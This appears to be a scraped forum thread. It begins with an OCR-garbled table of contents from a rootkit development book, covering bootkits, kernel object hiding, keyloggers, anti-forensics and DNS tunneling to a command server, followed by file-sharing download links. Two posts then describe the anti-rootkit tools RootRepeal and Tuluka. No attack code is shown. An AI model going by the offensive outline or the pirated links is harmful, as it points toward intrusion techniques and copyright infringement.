. . Detour Implementation. . . . . . . . . . 6.2 Binary Patching . . . . . . . . . . . . . . . Subverting the Master Boot Record . . . . The MBR in Depth . The Partition Table . . . . . . . . . . . . . 357 . 357 .358 .358 .359 · 361 . 365 · ... 365 . 367 · . . . 367 · . . . 368 .373 . 374 . 376 . 379 .380 .380 . . 383 Patch or Replace? ... . .. . Hidden Sectors . . . . . . . . . Bad Sectors and Boot Sectors . Rogue Partition . MBR Loader ... IA-32 Emulation. . Vbootkit ... .. . 6.3 Instruction Patching Countermeasures . Contents .386 . 387 . 388 . 389 . 390 . 393 . 395 .399 Chapter 7 Altering Kernel Objects. . . . . . . . . . . . . . . . . . . . 401 7.1 The Cost of Invisibility . . . . . . . . 401 Issue 1: The Steep Learning Curve . . . . . 401 Issue 2: Concurrency . . . . . . . . . . . . . 402 Issue 3: Portability and Pointer Arithmetic . 403 Branding the Technique: DKOM . . . . . . . 405 Objects? ...... ... .. ... .. . ... .. ... . . ... 405 7.2 Revisiting the EPROCESS Object . . 406 Acquiring an EPROCESS Pointer . 406 Relevant Fields in EPROCESS . . 409 UniqueProcessId . . . 409 ActiveProcessLinks. . 410 Token . . . . . . . . . 411 ImageFileName . . . . 411 7.3 The DRIVER_SECTION Object. . 411 7.4 The TOKEN Object . . . . . . . 414 Authorization on Windows . . . . . 414 Locating the TOKEN Object. . . . 416 Relevant Fields in the TOKEN Object . . 418 7.5 Hiding a Process. . . . . . . . . . 422 7.6 Hiding a Driver . . . . . . . . . . 428 7.7 Manipulating the Access Token. . 432 7.8 Using No-FU . . . . . . . 434 7.9 Countermeasures . . . . . . . . . 436 Cross-View Detection . . . . . . . 436 High-Level Enumeration: CreateToolhelp32SnapshotO . . 437 High-Level Enumeration: PID Bruteforce . 439 Low-Level Enumeration: Processes. . 442 Low-Level Enumeration: Threads. . 444 Related Software. . . . . . . . 451 Field Checksums. . . . . . . . . . . . . 452 Counter-Countermeasures . . . . . . . 452 7.10 Commentary: Limits of the Two-Ring Model . 
453 7.11 The Last Lines of Defense . . . . . . . . . . . 454 xi (ontents Chapter 8 Deploying Filter Drivers. . . . . . . . . . . . . . . . 8.1 Filter Driver Theory. . . . . . . . Driver Stacks and Device Stacks. . . . . . The Lifecycle of an IRP . . . . . . . . . . . Going Deeper: The Composition of an IRP IRP Forwarding . . . . . . . . . . IRP Completion . . . . . . . . . . . . . . . 8.2 An Example: Logging Keystrokes . . . . . The PS/2 Keyboard Driver and Device Stacks . Lifecycle of an IRP. . . . . . . . . . . . . . . Implementation . . . . . . . . . . . . . . . . 8.3 Adding Functionality: Dealing with IRQLs. Dealing with the Elevated IRQL . . Sharing Nicely: The Global Buffer . The Worker Thread . . . . . . . . . Putting It All Together . . . . . . . 8.4 Key Logging: Alternative Techniques . Set WindowsHookEx. . . . . . . . GetAsyncKeyState . . . . . . . . 8.5 Other Ways to Use Filter Drivers Part 111 - Anti-Forensics Chapter 9 xii Defeating Live Response . . . . . . . . . . . . . . . IDS, IPS, and Forensics . . Anti-Forensics .... Data Destruction . . Data Hiding . . . . . Data Transformation Data Contraception. Data Fabrication ... File System Attacks 9.1 The Live Incident Response Process The Forensic Investigation Process Collecting Volatile Data . . . Performing a Port Scan . . . . . . Collecting Nonvolatile Data .. .. The Debate over Pulling the Plug Countermeasures . . . . . . 9.2 RAM Acquisition .... .... . Software-Based Acquisition .. . KnTDD.exe. Autodump+ ..... . . .. . ... . 457 .458 .458 .460 . 461 .464 .465 .467 .467 .469 .470 . 475 .475 .477 .479 .483 . 484 .485 .488 .489 . . . . 493 . 494 .495 .496 . 496 .497 .497 .497 .497 .498 .498 .500 .504 .505 .508 .508 · . 509 · . 510 . 510 · .511 Chapter 10 LiveKd.exe . . . . . . . . . Crash Dumps . . . . . . . . Hardware-Based Acquisition. Countermeasures . . . . . . . Defeating File System Analysis. . . . . . 10.1 File System Analysis . .. Forensic Duplication . . . . Recovering Deleted Files . 
Enumerating ADSes . . . . Acquiring File Metadata . . Removing Known Good Files. File Signature Analysis . . . . Static Analysis of an Unknown Executable Run-time Analysis of an Unknown Executable 10.2 Countermeasures: Overview . .. . .. . 10.3 Countermeasures: Forensic Duplication . Reserved Disk Regions . . . . . . . . . . Live Disk Imaging. . . . . . . . . . . . . 10.4 Countermeasures: Deleted File Recovery. 10.5 Countermeasures: Acquiring Metadata Altering Timestamps . . . . . . . . . . . . Altering Checksums . . . . . . . . . . . . . 10.6 Countermeasures: Removing Known Files Move Files into the "Known Good" List . Introduce "Known Bad" Files . .. .. . . Flood the System with Foreign Binaries . Keep Off a List Entirely by Hiding . Out-of-Band Hiding .. . . .. . In-Band Hiding .. . . ... .... . Application Layer Hiding: M42 . . . 10.7 Countermeasures: File Signature Analysis 10.B Countermeasures: Executable Analysis . Foiling Static Executable Analysis . Cryptors ...... .. .. . . Encryption Key Management. . . . Packers . ....... .. . . . .. . Augmenting Static Analysis Countermeasures Foiling Run-time Executable Analysis . Attacks against the Debugger. . . . . Breakpoints . . . . . . . . . . . . . . Detecting a User-Mode Debugger . . Detecting a Kernel-Mode Debugger. Detecting a User-Mode or Kernel-Mode Debugger Contents · 513 · 513 · 514 · 515 ... . 517 · 517 · 519 · 521 · 521 . 523 .527 . 529 . 530 · 533 .537 · 538 .538 . 539 · 542 . 544 .544 .546 · 547 · 547 .548 . 548 . 549 . 549 . 555 .566 · 567 .568 .568 .571 . 580 · 581 · 583 · 585 .586 . 586 · 587 . 588 · 588 xi ii (ontents Chopter 11 xiv Detecting Debuggers via Code Checksums. . Land Mines .. . ...... . Obfuscation .......... . . Obfuscating Application Data. Obfuscating Application Code The Hidden Price Tag . . . . 10.9 Borrowing Other Malware Tactics . Memory-Resident Rootkits .... . Data Contraception . . . . . . . . . The Tradeoff: Footprint versus Failover . Defeating Network Analysis . . . . • . 
. . . . . . . 11 .1 Worst-Case Scenario: Full Content Data Capture .... 11 .2 Tunneling: An Overview . HTTP. DNS ........ . ICMP ....... . Peripheral Issues . 11.3 The Windows TCPIIP Stack Windows Sockets 2 . Raw Sockets . . . . . Winsock Kernel API . NDIS ...... . . . Different Tools for Different Jobs. 11 .4 DNS Tunneling. DNS Query . ... ....... . DNS Response . . . . . . . . . . 11.5 DNS Tunneling: User Mode ... 11 .6 DNS Tunneling: WSK Implementation. Initialize the Application's Context. .. Create a Kernel-Mode Socket . .... Determine a Local Transport Address . Bind the Socket to the Transport Address. Set the Remote Address (the C2 Client). Send the DNS Query . . . . Receive the DNS Response. . . . . . . . 11.7 NDIS Protocol Drivers . . . . . . . . . . Building and Running the NDISProt 6.0 Example. An Outline of the Client Code An Outline of the Driver Code The ProtocolxxxO Routines. Missing Features. . . . . . . . · 589 .590 .590 · 591 · 592 . 595 . 596 . 596 · 597 . 599 . . . . 603 . . . . . 604 . 605 .606 .607 .607 .609 · 610 .611 · 612 · 613 · 614 · 616 · 617 · 617 · 619 · 621 · 625 .632 .632 · 634 · 635 · 636 . 638 .639 · 641 · 642 . 646 .649 .652 .656 Chapter 12 Countermeasure Summary . . . 12.1 Live Incident Response . 12.2 File System Analysis . . 12.3 Network Traffic Analysis 12.4 Why Anti-Forensics? .. Port IV - End Material Chapter 13 Chapter 14 Appendix The Tao of Rootkits . . . . . . . Run Silent, Run Deep . . . . . . Development Mindset. . . . . . On Dealing with Proprietary Systems . Staking Out the Kernel . . . . . . . . . Walk before You Run: Patching System Code . Walk before You Run: Altering System Data Structures The Advantages of Self-Reliant Code Leverage Existing Work Use a Layered Defense .. . .. . Study Your Target . . . . . . . . . Separate Mechanism from Policy . Closing Thoughts . . . . . . . . . . . . . Chapter 2 ..... . . Project: KillDOS. . Project: HookTSR . Project: HideTSR . Project: Patch Chapter 3 . SSDT .. . . 
Chapter 4 ... . Project: Skeleton (KMD Component). Project: Skeleton (User-Mode Component) Project: Installer . Project: Hoglund. . . . . . . . . . . Project: SD .... . . .. .. .. . . Project: HBeat (Client and Server) . Project: IRQL . . . . . . Chapter 5 . ..... . . . . Project: RemoteThread . Contents · . . . 659 .660 . 662 . 663 .664 · .. . 669 . 669 . 670 · 670 .671 · 672 ... 672 · 673 · 675 · 675 . 676 · 676 · .. . 677 . 683 . 683 . 684 · 691 . 696 . 697 . 697 .710 · 710 · 714 · 721 . 724 .726 · 729 . 736 . 739 · 739 xv Contents xvi Project: ReadPE .. .. . ..... . .. .... ... 741 Project: HookIAT . . .... ... . . 746 Project: HookIDT . . . . . . . 750 Project: HookSYS . . . . . . . 756 Project: HookSSDT . . 760 Project: HookIRP . . . . . . . . . . 772 Project: HookGDT . .. ... . .. . 774 Project: AntiHook (Kernel Space and User Space) . . . . . . . . 779 Project: ParsePEB. . . . . . . . . . . . . . . . . . . . .. . . 790 Chapter 6 . . . . . . . . . . . . . . . . . . . . . . . . . . .. .. 793 Project: TraceDetour . . . . . 793 Project: GPO Detour . . . . . . . . 801 Project: AccessDetour. . . . . . . . . . 804 Project: MBR Disassembly . . . . . . . . . . . . 811 Project: LoadMBR. . . . . . . . . . . . . . . . . 813 Chapter 7 . . . . . . . . . . . .. ... .. .. . ... . .... 816 Project: No-FU (User-Mode Portion) .. .... . .... . .. . 816 Project: No-FU (Kernel-Mode Portion) . ... ... ....... 821 Project: TaskLister . . . 834 Project: findFU . . . . .. ... ............... . 838 Chapter 8 . . . . . . . . . .. .. ..... ...... . ... . . 843 Project: KiLogr-VOl . . . . .. . . . . .... . 843 Project: KiLogr-V02. . . .. ... .. . ..... 847 Chapter 10 . . . . . . . . . .. . . . .. . . . . . . 854 Project: TSMod . . . . . . . . . . 854 Project: Slack .. . . . . . . . . . 858 Project: MFT . . . . . . . . . . 860 Project: Cryptor . .. . . . . . . . . 871 Chapter 11 . . . .. .. . . . . . . . . 876 Project: UserModeDNS . . 876 Project: WSK-DNS . ....... . .... ... .. ... . .. 
883 Index . ............. . . .. . 895 Download: http://www.mediafire.com/?7jl44499d94l3l9 http://www.megaupload.com/?d=C4TS6FFB Stiu ca mai e postata pe undeva pe aici, dar link-ul nu mai e valid iar cartea asta se merita descarcata.
23. RootRepeal - New Rootkit Detector Tool

RootRepeal is a new kernel-land-based anti-rootkit tool which is simple to use yet powerful. It is currently in beta and, as of now, supports only x86 systems.

Main features:

- Driver Scan - scans the system for kernel-mode drivers. Displays all drivers currently loaded, and shows if a driver has been hidden, and whether the driver's file is visible on disk.
- Files Scan - scans any fixed drive on the system for hidden, locked or falsified* files.
- Processes Scan - scans the system for processes. Displays all processes currently running, and shows if a process is hidden or locked.
- SSDT Scan - shows whether any of the functions in the System Service Descriptor Table (SSDT) are hooked.
- Stealth Objects Scan - attempts to determine if any rootkits are active by looking for typical symptoms.
- Hidden Services Scan - scans for hidden system services.
- Shadow SSDT Scan - counterpart to the SSDT Scan, but deals mostly with graphics and window-related functions.

Due to the nature of these kinds of tools, you are always advised to have backups of all important data before running it. It is also advised to run it in a virtual machine such as VMware.

For more details, and to test it yourself, visit the project page of RootRepeal.

Download: http://ad13.geekstogo.com/RootRepeal.rar

Source: SecurityXploded Forum - View topic - RootRepeal - New Rootkit Detector Tool
24. Anti-Rootkit Tool - Tuluka Kernel Inspector

Here's the new anti-rootkit tool "Tuluka Kernel Inspector" by Libertad from Tuluka.org. It has the following core features:

- Detects hidden processes, drivers and devices
- Detects IRP hooks
- Identifies the substitution of certain fields in the DRIVER_OBJECT structure
- Checks driver signatures
- Detects and restores SSDT hooks
- Detects suspicious descriptors in the GDT
- IDT hook detection
- SYSENTER hook detection
- Displays the list of system threads and allows you to suspend them
- IAT and inline hook detection
- Shows the actual values of the debug registers, even if reading these registers is controlled by someone
- Allows you to find the system module by an address within this module
- Allows you to display the contents of kernel memory and save it to disk
- Allows you to dump kernel drivers and the main modules of all processes
- Allows you to terminate any process
- Is able to disassemble interrupt and IRP handlers, system services, start routines of system threads and many more
- Allows you to build the stack for a selected device
- Many more...

It is tested on the following operating systems (32-bit):

- Windows XP SP0, SP1, SP2, SP3
- Windows Server 2003 SP0, SP1, SP2, R2
- Windows Vista SP0, SP1, SP2
- Windows Server 2008 SP0, SP1, SP2
- Windows 7 SP0, SP1

Though it currently supports only the 32-bit version, support for 64-bit is expected in upcoming versions.

You can download it from here: http://www.tuluka.org/Download.html

Source: SecurityXploded Forum - View topic - New Anti-Rootkit Tool - Tuluka Kernel Inspector